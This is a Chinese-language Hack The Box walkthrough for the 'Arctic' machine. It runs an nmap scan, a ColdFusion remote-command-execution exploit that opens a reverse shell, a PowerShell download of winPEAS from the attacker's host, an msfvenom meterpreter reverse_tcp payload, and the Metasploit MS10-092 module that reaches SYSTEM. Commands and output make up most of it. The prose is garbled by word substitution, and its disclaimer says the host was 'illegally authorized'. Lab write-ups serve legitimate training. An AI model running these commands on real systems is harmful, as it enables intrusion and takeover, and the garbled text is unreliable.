免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。

服务发现

┌──(rootkali)-[~/htb/Arctic]└─# nmap -Pn -sV 10.10.10.11 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-14 10:26 ESTNmap scan report for 10.10.10.11Host is up (0.26s latency).Not shown: 65532 filtered portsPORT      STATE SERVICE VERSION135/tcp   open  msrpc   Microsoft Windows RPC8500/tcp  open  fmtp?49154/tcp open  msrpc   Microsoft Windows RPCService Info: OS: Windows; CPE: cpe:/o:microsoft:windows

连个web服务都没有,一下子有点懵。。
8500端口不太常见,尝试在浏览器上关上,十分慢,然而存在一个文件遍历破绽

Index of /CFIDE/               dir   03/22/17 08:52 cfdocs/              dir   03/22/17 08:55 

上面门路是一个cms的登录页面

http://10.10.10.11:8500/CFIDE/administrator/

看title上的cms名字:ColdFusion

在谷歌找了几个这个cms的exp,找到了这个Remote Command Execution

下载到本地,批改本地ip和端口

执行攻打:

rinting some information for debugging...lhost: 10.10.14.6lport: 4444rhost: 10.10.10.11rport: 8500payload: 7ed641ce03ea4eaa92aca6d9ef4c60ab.jspDeleting the payload...Listening for connection...Executing the payload...listening on [any] 4444 ...connect to [10.10.14.6] from (UNKNOWN) [10.10.10.11] 49510Microsoft Windows [Version 6.1.7600]Copyright (c) 2009 Microsoft Corporation.  All rights reserved.C:\ColdFusion8\runtime\bin>whoamiwhoamiarctic\tolisC:\ColdFusion8\runtime\bin>

拿到了初始shell。。

提权

传winpea到靶机

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.6:8000/winPEAS.bat','c:\Users\tolis\Desktop\winPEAS.bat')"

依据winpea枚举显示,靶机短少较多补丁,可能能够利用来提权

                                                                                                                                                                                                                                            "Microsoft Windows Server 2008 R2 Standard "                                                                                                                                                                                                   [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat)                                                                                                                                           MS11-080 patch is NOT installed XP/SP3,2K3/SP3-afd.sys)                                                                                                                                                                                     MS16-032 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon)                                                                                                                                                                  MS11-011 patch is NOT installed XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa)                                                                                                                                               MS10-59 patch is NOT installed 2K8,Vista,7/SP0-Chimichurri)                                                                                                                                                                                 MS10-21 patch is NOT installed 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel)                                                                                                                                              MS10-092 patch is NOT installed 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched)                                                                                                                                                                   MS10-073 patch is NOT installed XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout)                                                                                                                                                 MS17-017 patch is NOT installed 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading)                                                                                                                                                              MS10-015 patch is NOT installed 2K,XP,2K3,2K8,Vista,7-User Mode to Ring)                                                                                                                                                                    MS08-025 patch is NOT installed 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys)                                                                                                                                                     MS06-049 patch is NOT installed 2K/SP4-ZwQuerySysInfo)                                                                                                                                                                                      MS06-030 patch is NOT installed 2K,XP/SP2-Mrxsmb.sys)                                                                                                                                                                                       MS05-055 patch is NOT installed 2K/SP4-APC Data-Free)                                                                                                                                                                                       MS05-018 patch is NOT installed 2K/SP3/4,XP/SP1/2-CSRSS)                                                                                                                                                                                    MS04-019 patch is NOT installed 2K/SP2/3/4-Utility Manager)                                                                                                                                                                                 MS04-011 patch is NOT installed 2K/SP2/3/4,XP/SP0/1-LSASS service BoF)                                                                                                                                                                      MS04-020 patch is NOT installed 2K/SP4-POSIX)                                                                                                                                                                                               MS14-040 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer)                                                                                                                                                   MS16-016 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address)                                                                                                                                                                MS15-051 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys)                                                                                                                                                                 MS14-070 patch is NOT installed 2K3/SP2-TCP/IP)                                                                                                                                                                                             MS13-005 patch is NOT installed Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast)                                                                                                                                                               MS13-053 patch is NOT installed 7SP0/SP1_x86-schlamperei)                                                                                                                                                                                   MS13-081 patch is NOT installed 7SP0/SP1_x86-track_popup_menu)   

编译一个meterpreter的shell传到靶机,不便咱们利用补丁提权:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4455 -f exe > shell64.exe

拿到反弹的session当前,抉择MS10-092补丁的利用模块

msf6 > search MS10-092Matching Modules================   #  Name                                        Disclosure Date  Rank       Check  Description   -  ----                                        ---------------  ----       -----  -----------   0  exploit/windows/local/ms10_092_schelevator  2010-09-13       excellent  Yes    Windows Escalate Task Scheduler XML Privilege EscalationInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms10_092_schelevator

设置好参数

msf6 exploit(windows/local/ms10_092_schelevator) > optionsModule options (exploit/windows/local/ms10_092_schelevator):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   CMD                        no        Command to execute instead of a payload   SESSION   2                yes       The session to run this module on.   TASKNAME                   no        A name for the created task (default random)Payload options (windows/x64/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST     tun0             yes       The listen address (an interface may be specified)   LPORT     4466             yes       The listen portExploit target:   Id  Name   --  ----   0   Windows Vista, 7, and 2008

动员攻打

msf6 exploit(windows/local/ms10_092_schelevator) > run[*] Started reverse TCP handler on 10.10.14.6:4466 [*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\bHVjZOnFoCage.exe[*] Creating task: wHs9mNJi8EUp2[*] SUCCESS: The scheduled task "wHs9mNJi8EUp2" has successfully been created.[*] SCHELEVATOR[*] Reading the task file contents from C:\Windows\system32\tasks\wHs9mNJi8EUp2...[*] Original CRC32: 0xc87307c[*] Final CRC32: 0xc87307c[*] Writing our modified content back...[*] Validating task: wHs9mNJi8EUp2[*] [*] Folder: \[*] TaskName                                 Next Run Time          Status         [*] ======================================== ====================== ===============[*] wHs9mNJi8EUp2                            1/1/2022 6:04:00 ��    Ready          [*] SCHELEVATOR[*] Disabling the task...[*] SUCCESS: The parameters of scheduled task "wHs9mNJi8EUp2" have been changed.[*] SCHELEVATOR[*] Enabling the task...[*] SUCCESS: The parameters of scheduled task "wHs9mNJi8EUp2" have been changed.[*] SCHELEVATOR[*] Executing the task...[*] Sending stage (200262 bytes) to 10.10.10.11[*] SUCCESS: Attempted to run the scheduled task "wHs9mNJi8EUp2".[*] SCHELEVATOR[*] Deleting the task...[*] Meterpreter session 3 opened (10.10.14.6:4466 -> 10.10.10.11:49789) at 2021-12-15 03:06:45 -0500[*] SUCCESS: The scheduled task "wHs9mNJi8EUp2" was successfully deleted.[*] SCHELEVATORmeterpreter > getuidServer username: NT AUTHORITY\SYSTEM

胜利提权到AUTHORITY\SYSTEM